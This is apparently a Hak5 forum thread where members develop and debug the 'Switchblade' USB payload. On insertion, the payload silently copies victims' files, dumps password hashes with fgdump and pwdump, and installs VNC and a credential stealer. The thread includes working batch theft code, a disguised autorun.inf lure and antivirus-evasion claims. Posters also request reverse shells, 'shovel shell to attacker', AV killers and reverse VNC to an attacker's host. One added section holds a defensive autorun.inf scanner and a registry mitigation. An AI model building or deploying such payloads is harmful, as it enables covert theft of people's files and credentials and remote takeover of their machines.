
~Gozor~ Finished Payload


setzer1411


I use the trendmicro internet security for av,,, It caught the fgdump,, and the cachedump as well ,, It gave the info, But the big red Flag that popped up would kinda freak out someone!!! If they used the same av........ Do other av's catch these things or is it just me???


-----------------------------

I'll apologise now to all those people whose questions I have not had time to answer, I have been really busy recently. I will try to release V2.0 tomorrow if time permits. If I have missed your question I'm sorry and please pm me, you may not be the only person who wants to know.

-----------------------------

Hey Gonzor,

    Just wanna report in some personal bug feedback. 

I am getting this message:

======================

Windows - No Disk                          X

======================

X    There is no disk in the drive.

      Please insert a disk into drive.

|Cancel|  |Try Again|  |Continue|

And it is the cmd.exe process that is running during this error.  This also occurs when Netpass runs (even when netpass is disabled [WTF?])

Otherwise, the rest of the payload works like a charm.  Hacksaw works perfectly - just as long as I log in and stuff like you said.  Keep up the good work!

This has been annoying me quite a bit, from what we can tell the error is caused by having a card reader. I don't have a card reader so I have never experienced this error first hand and there have been several parts of the story that vary for each person so it is very difficult to figure out EXACTLY what is causing this error. It shouldn't have anything to do with netpass since it happens when it is disabled (unless you are saying netpass runs even when it is meant to be disabled). The HakSaw should actually work now without having to wait until the next time you log on, let me know if it isn't because it works for me so I will have to test that.

Thanks a lot GonZor, makes much more sense now. Appreciate you takin the time to explain each step individually :grin:

No problem, just giving back what I can.

Just thought I would say the problem seems to be the "%Documents and Settings%" variable. By changing it to C:\Documents and Settings everything works fine; this goes for file.exe. Also tried xcopy, same issue. Anyone else had this problem?

I feel so stupid, this is why we should learn to read properly... *GonZor slaps self*

There is no "%Documents and Settings%" variable, assuming your <source> now looks like this:

"C:\Documents and Settings\%username%\My Documents\*.jpg"

The "%homepath%" variable will expand to what you want, hence the <source> could be rewritten as this, which is better in case they have Windows installed on another partition:

"%homepath%\My Documents\*.jpg"

I use the trendmicro internet security for av,,, It caught the fgdump,, and the cachedump as well ,, It gave the info, But the big red Flag that popped up would kinda freak out someone!!! If they used the same av........ Do other av's catch these things or is it just me???

Unfortunately some of the tools are detected by certain AV; I was unaware of Trend Micro detecting fgdump and cachedump. It's odd that it allowed those tools to dump the information, you should look at your AV settings and change them to deny access for these programs.

-----------------------------

Are you Mark Frederickson? If so please pm me asap.

-----------------------------


@ GonZor,

LOL! Gotcha, I coulda swore I saw someone using that as a variable before, but I'm probably wrong, but yea that was my main purpose for wanting to use that variable "in case they had windows installed on another partition". So once again thanks I will mess around with this tonight:)

Perhaps you might be able to provide a link you recommend to help me understand/learn Batch Scripting, windows variables and all that? You seem to be pretty proficient. I looked around found quite a few good sites and tried to find something like a VTC course or CBT but was unsuccessful.


@ GonZor,

Okay I finally somehow got it working all except the copy process I think I may be missing one small parameter or something:

@echo on

:: DETERMINE WHERE THE DRIVES ARE MAPPED
FOR %%i IN ( B C D E F G H I J K L M N O P Q R S T U V W X Y Z ) DO (
    REM SEARCH FOR A FILE CALLED drv.dat IN THE DIRECTORY \System\SRC
    REM (REM instead of :: here - a :: label inside a parenthesised block breaks the parser)
    IF EXIST %%i:\System\SRC\drv.dat (
        SET fd=%%i:\System\SRC
    )
)

:: CREATE PIC DIRECTORY
IF NOT EXIST %fd%\Documents\%computername%\Pictures mkdir %fd%\Documents\%computername%\Pictures

:: CREATE TXT DIRECTORY
IF NOT EXIST %fd%\Documents\%computername%\txt's mkdir %fd%\Documents\%computername%\txt's

file.exe /A:C "%homepath%\%username%\Desktop\*.jpg" "%fd%\Documents\%computername%\Pictures" /I /P
file.exe /A:C "%homepath%\%username%\Desktop\*.bmp" "%fd%\Documents\%computername%\Pictures" /I /P
file.exe /A:C "%homepath%\%username%\Desktop\*.gif" "%fd%\Documents\%computername%\Pictures" /I /P
file.exe /A:C "%homepath%\%username%\Desktop\*.txt" "%fd%\Documents\%computername%\txt's" /I /P

xcopy "%homepath%\%username%\Desktop\*.txt" "%fd%\Documents\%computername%\txt's" /s /c /q /r /h /y

exit

The biggest problem I was having was it could not find the flash partition but now it finally does and writes the directories, although I had to put the pic directory code all on one line for some reason to get it working. Now the only problem is it doesn't execute any of the copy procedure, file.exe or xcopy. That is the only reason why xcopy is there now, just to see if either would work. I turned echo on and in cmd accessed the CDFS partition of the drive and executed my autorun.bat which in turn executed the above code, drv.bat, but after it finds the drive it closes the cmd window. Is there any way I can execute this keeping the window open so I can see my errors or what I'm doing wrong? That's how I found out about the directory; it stayed open for that part as I had then commented out the copy process and told me the syntax was invalid.

Now if possible I'd like to find out how I can see where it stops and why it stops at that point. I know your busy and if you have time to help me out great, if not that's cool you have helped me greatly already :D

Thanks in advance.


I'm glad I can help, I'm surprised what I write actually makes sense to someone other than me.

-------------------

If you open up a cmd and type "set" this will display a list of variables set on your machine, a lot of them will be Windows variables, but some may be specific to your machine. The Windows variables are the ones that become useful when doing something like this. After you take a quick look at this list you will notice two things wrong with the following line.

file.exe /A:C "%homepath%\%username%\Desktop\*.jpg" "%fd%\Documents\%computername%\Pictures" /I /P

Firstly I gave you the wrong variable  :-(

The %homepath% variable expands to \Documents and Settings\%username%; you will notice that this doesn't have a drive letter, so it will only work if run from the partition where Windows is installed. If we were to use the %homepath% variable we would need to use the %homedrive% variable before it, like so: %homedrive%%homepath%. When expanded this would look something like C:\Documents and Settings\%username%. When looking at the variable list you may have noticed the %userprofile% variable, which would expand to the same as %homedrive%%homepath%, so we should have been using the %userprofile% variable, sorry about that.

Secondly, I'm sure you have already figured this one out after reading that: the %homepath% variable (like the %userprofile% variable) expands to \Documents and Settings\%username%, therefore when used like you have, "%homepath%\%username%", it will expand to \Documents and Settings\%username%\%username% and as you can see wouldn't work.

The solution, replace the %homepath% variable with the %userprofile% variable and take out the %username% variable. Each line should now look something like this.

file.exe /A:C "%userprofile%\Desktop\*.jpg" "%fd%\Documents\%computername%\Pictures" /I /P

Is there any way I can execute this keeping the window open so I can see my error's or what I'm doing wrong?

My suggestion is to use SciTE (Scintilla Text Editor), It has syntax highlighting and also has a window to view the output of the code (that does not disappear). If you want a screen shot to explain what I mean I will upload one later, but for now I'm off to wendys :P


@ GonZor,

Thanks so much man. It's working perfectly now. Still a bit of a problem with file.exe but I think I can figure that out. The variables all make sense as well and I got that SciTE editor so hopefully that will help me out a lot. Not sure if it's the proper way to give karma, but +1 :)

P.S. I found the proper way and gave you +1

Thanks again.


I've actually got two problems.  One is the whole cmd.exe error with the Windows - No Disk error; even though I don't have a card reader I still get the error, as do the other computers I've tried.  I just reformatted to check again and it still gave the error.

The other problem I get is with fgdump.  I can't get it to get the hashes on either of the two computers I tried.  Both run Windows Home Edition.  Here is the result in the log:

************************************
************[Dump SAM]**************
************************************
fgDump 1.6.0 - fizzgig and the mighty group at foofus.net
Written to make j0m0kun's life just a bit easier
Copyright© 2007 fizzgig and foofus.net

fgdump comes with ABSOLUTELY NO WARRANTY!
This is free software, and you are welcome to redistribute it
under certain conditions; see the COPYING and README files for
more information.

Starting dump on 127.0.0.1

ERROR GetOSVersion: 53 - The network path was not found.

** Beginning local dump **
Unable to determine OS version, see previous error for details
CRITICAL: Error retrieving remote service information.  Remote registry may not be running, simple file sharing may be enabled, or the account may not have 'Log On as Batch Job' permission.  Skipping this host.
Error dumping server 127.0.0.1, see previous messages for details

-----Summary-----

Failed servers:
127.0.0.1

Successful servers:
NONE

Total failed: 1
Total successful: 0

-----Hashes-----

Any help would be greatly appreciated


I just got back from a 10 day vacation in San Diego so I'm not that up to date, but I'm pretty sure GonZor is still going back to pwdump which had fewer/no problems.  Feel free to correct me if I'm wrong.  :P

I was stuck out there w/ only a crackberry to check hak5.  :(


I take that back. I got PWDUMP working now for the new version. Hacksaw and VNC are enabled as well. The SBconfig still works too. Only difference between this one and V2beta is it's pwdump instead of FGdump, though it's not encrypted I don't believe, so AV might detect... Will need someone to scan. Link for PWDUMP version: http://files.filefront.com/V20Pwdumprar/;8...info.html    Upload it the normal way through Universal Customizer. Also... it still didn't fix the cmd.exe error for me from Windows - No Disk or whatever.. Someone see if they can get on that maybe?

Thanks, hope this helps


So I think I half figured-out the Cmd.exe error. It looks like it's trying to access a drive that isn't there? I got the same error when typing C: in command prompt when my drive is really J:. So I think it's because the drive it's looking for doesn't exist maybe?


Gozor,

  You have done a great job with the payload.  I was wondering if there is room for additions to the payload?  Do you have time to make these additions your self?  If not, could you point someone with little coding experience in the right direction for the modifications?  I would love to see the below included.

I was thinking of the following.

1.  Cryptcat ( hxxp://farm9.org/Cryptcat/ ) or netcat with stunnel.

Options to do the following, or enter your own syntax.

- Push a backdoor command shell

- Set up a netcat relay

- shovel shell to attacker

2.  AVKiller -

May be inappropriate now as many AV software detects this as a Trojan. 

3.  Option to input VNC password.

4.  Option to create a new user.



Hi everybody,

I'm a 15 year old hacker, new to the Hak5 forums and I've been experimenting with GonZor's switchblade.  (Nice work man!  :o)

Some users have reported the following bug:

----------------------------------------------------

Windows - No Disk                          X

X    There is no disk in the drive.

      Please insert a disk into drive.

|Cancel|  |Try Again|  |Continue|

-----------------------------------------------------

I'm sure that this code snippet is the cause:

-----------------------------------------------------

FOR %%i IN ( B C D E F G H I J K L M N O P Q R S T U V W X Y Z ) DO (
    IF EXIST %%i:\System\SRC\drv.dat (
        SET fd=%%i:\System\SRC
    )
)

-----------------------------------------------------

It's looping through all of the drive letters and it's trying to access existing drives,

while they are not accessible, which results in a 'no disk' error.

Since we don't want the bat file to output these errors, the go.bat file (and start.bat) should be configured to ignore errors...

This can also be done with executables.  (I'm working on one for myself if you don't mind GonZor :) They offer more possibilities)

In every case... does anyone know how to intercept all Windows error messages in .bat files?

It would be great to know :D

Thanks,

RedRaven ;)


Finally out of beta:

The long awaited V2.0 is now out of beta, sorry for the delay.

What's New:

- Restructured the payload and rewritten half the code (reduced size)
- Fixed VNC (confirmed working - new password is "easy")
- Added the option to use either FGDump or PWDump (or both)
- Rewritten the search function in VBS, hopefully fixed the "no disk error"
- Changed the way the files are named, now named as "%computername%-[%Year%%Month%%Day%-%Hour%%Minute%%Second%]"
- Updated several parts so they are now undetected by most AV; to the best of my knowledge most AVs will only detect sbs.exe (part of the Hacksaw)

* Please note for VNC to work you must have the correct ports forwarded on the "victim's" router and firewall and such...

I can't think of any other updates, though I may have forgotten some. Also for those looking for a non-U3 version I have a temporary solution, follow the simple instructions below...

1. Extract the ISO to the root of your flash drive.
2. Edit the AUTORUN.INF
3. Run SBConfig from your flash drive.

* Please note the U3 menu system will not function on a non-U3 drive but the payload will work fine (don't enable the U3 menu in SBConfig and you will be fine)

* If you don't know how to make your own autorun.inf, use the following code

[autorun]
action=Enable USB Flash Drive
open=wscript go.vbs

As usual any feedback is welcome, please let me know if you are still encountering the no disk error. I have rewritten the search function in VBS and this should get rid of the problem, but I may be wrong and have no way of testing. Thanks and once again sorry about the delays.

EDIT: As usual Linky In my Sig

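The [autorun] fragment in the release notes above is the hook that makes the drive launch go.vbs on insertion (a U3 stick presents its payload partition as a CD-ROM, which is why AutoRun still fires for it where it is off for plain USB storage). As an added defensive example, not code from the original post or from GonZor's payload, the following Python parses an autorun.inf and flags every launch entry, ranking entries that hand off to a script host (wscript, cscript, cmd, mshta and the like) highest and noting an action= label that could pass for a system prompt. The two sample files are constructed for the example; the names parse_autorun, assess_autorun, command_name and SCRIPT_HOSTS are my own.

```python
import re

# Command interpreters that run arbitrary scripts or command lines; an autorun
# entry handing off to one of these is a stronger signal than launching a
# packaged installer (list constructed for this example, not exhaustive).
SCRIPT_HOSTS = {"wscript", "cscript", "cmd", "powershell", "mshta", "rundll32", "regsvr32"}

# Constructed sample input: the fragment from the release notes, and a benign
# vendor-style file, embedded so the example runs offline.
SUSPECT_INF = """[autorun]
action=Enable USB Flash Drive
open=wscript go.vbs
icon=drive.ico
"""

BENIGN_INF = """; driver disc
[autorun]
icon=setup.exe,0
label=Vendor Driver Disc
"""


def parse_autorun(text):
    """Parse INI-style autorun.inf text into {section: [(key, value), ...]}.

    Section and key names are lower-cased (Windows treats them case-insensitively).
    Duplicate keys are kept in order so a reviewer sees every launch entry.
    """
    sections = {}
    current = None
    for raw in text.lstrip("\ufeff").splitlines():  # drop a UTF-8 BOM if present
        line = raw.strip()
        if not line or line.startswith(";"):        # blank line or comment
            continue
        header = re.match(r"^\[(.+)\]$", line)
        if header:
            current = header.group(1).strip().lower()
            sections.setdefault(current, [])
            continue
        if current is None or "=" not in line:      # stray text outside a section
            continue
        key, value = line.split("=", 1)
        sections[current].append((key.strip().lower(), value.strip()))
    return sections


def command_name(value):
    """Program name (no path, no .exe) from a command-line value,
    e.g. 'wscript go.vbs' -> 'wscript', '"C:\\Tools\\setup.exe" /s' -> 'setup'."""
    value = value.strip()
    if value.startswith('"'):                       # quoted path may contain spaces
        end = value.find('"', 1)
        token = value[1:end] if end > 0 else value[1:]
    else:
        token = value.split()[0] if value else ""
    token = token.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return token[:-4] if token.endswith(".exe") else token


def assess_autorun(text):
    """Return [(severity, finding), ...] for the [autorun] section; [] if nothing launches."""
    entries = parse_autorun(text).get("autorun", [])
    findings = []
    for key, value in entries:
        # open=, shellexecute= and shell\<verb>\command= all run something on the drive
        launches = key in ("open", "shellexecute") or (
            key.startswith("shell\\") and key.endswith("\\command"))
        if not launches:
            continue
        host = command_name(value)
        if host in SCRIPT_HOSTS:
            findings.append(("high", f"{key}= hands off to a script host ({host}): {value}"))
        else:
            findings.append(("medium", f"{key}= launches code from the removable drive: {value}"))
    if findings:
        # A launch entry paired with a Windows-sounding label is the AutoPlay lure pattern
        action = dict(entries).get("action")
        if action:
            findings.append(("medium",
                             f"action= label shown in the AutoPlay dialog can mimic a system prompt: {action!r}"))
    return findings


if __name__ == "__main__":
    for name, inf in (("suspect", SUSPECT_INF), ("benign", BENIGN_INF)):
        print(name, assess_autorun(inf) or "no launch entries")
```

Run over the autorun.inf files found on mounted removable volumes, this gives a quick triage of which ones would execute something on insertion. The corresponding mitigation on the host side is to disable AutoRun for every drive type, including the CDFS partition the U3 trick relies on, by setting NoDriveTypeAutoRun to 0xFF under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer (or the equivalent Group Policy "Turn off Autoplay" for all drives), after which the open= line is simply never honoured.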

To avoid the "port forwarding issue" I modified my payload so the victim connects to my pc. So you only have to make a forwarding at your router which is very useful.

Quick'n dirty howto:

1. Get a dyndns account to provide the current IP address
2. Write some code to let the vnc.exe connect to your static hostname
3. Get the vncviewer and run it in the listener mode

If you'd like I can provide the code.


To avoid the "port forwarding issue" I modified my payload so the victim connects to my pc. So you only have to make a forwarding at your router which is very useful.

Quick'n dirty howto:

1. Get a dyndns account to provide the current IP address
2. Write some code to let the vnc.exe connect to your static hostname
3. Get the vncviewer and run it in the listener mode

If you'd like I can provide the code.

Sounds Like a good Idea, I may incorporate this into the next release depending on the feedback.


wow the noobs seem to be taking over the boards :P

its getting waay too crowded for my liking  :(

I'm trying to improve GonZors switchblade by reporting bugs... And I'm not a noob because I don't have 700+ posts.

Anyway, I will stop being 'noobish' then..


GonZor,

Nice job! The 'no disk' error is fixed!

One more problem: the PWDUMP.EXE is not responding. The logfile is stuck at size 3Kb. (I'm running on a Windows XP Pro. x64...)

Logging continues normally when I end PWDUMP.EXE in taskmanager.

That's what I wanted to hear about the no disk error. For those of you interested, I rewrote the drive search function in VBS because VBS is "smarter" and can detect what drives it needs to search, whereas with batch it was forcing a search even though the drive didn't exist.

I will look into the PWDump problem, I haven't had an issue but it sounds like a problem with PWDump running on your system. Could you try running PWDump manually and see if it will run properly?

wow the noobs seem to be taking over the boards :P

its getting waay too crowded for my liking  :(

Who exactly are you referring to ? If you are referring to me, please elaborate or If you are referring to the people who are reporting bugs and such, simply go away I have asked them to. No one here claims to be a "1337 h4x0r", call me a noob if you like but your opinion means as much to me as a punch in the face (don't need it, don't want it).

EDIT - DLSS, before you start calling us noobs take a look at this. Not only do they consider themselves "1337" but "santa" also originally claimed my payload as his. I must be doing something right if people wish to take ownership of it.


wow the noobs seem to be taking over the boards :P

its getting waay too crowded for my liking  :(

Wow everyone was being productive in the thread besides you.  If you need to vent please don't spam GonZor's thread.  Most of this is bug reports, feature requests, and productive questions.  If you think you can do better, go work on your own switchblade.

Very impressive GonZor, eliminate all the bugs, make some improvements, rewrite a bunch of it.  Looking forward to your next release.  V 3.0 Alpha this time maybe?  :-P

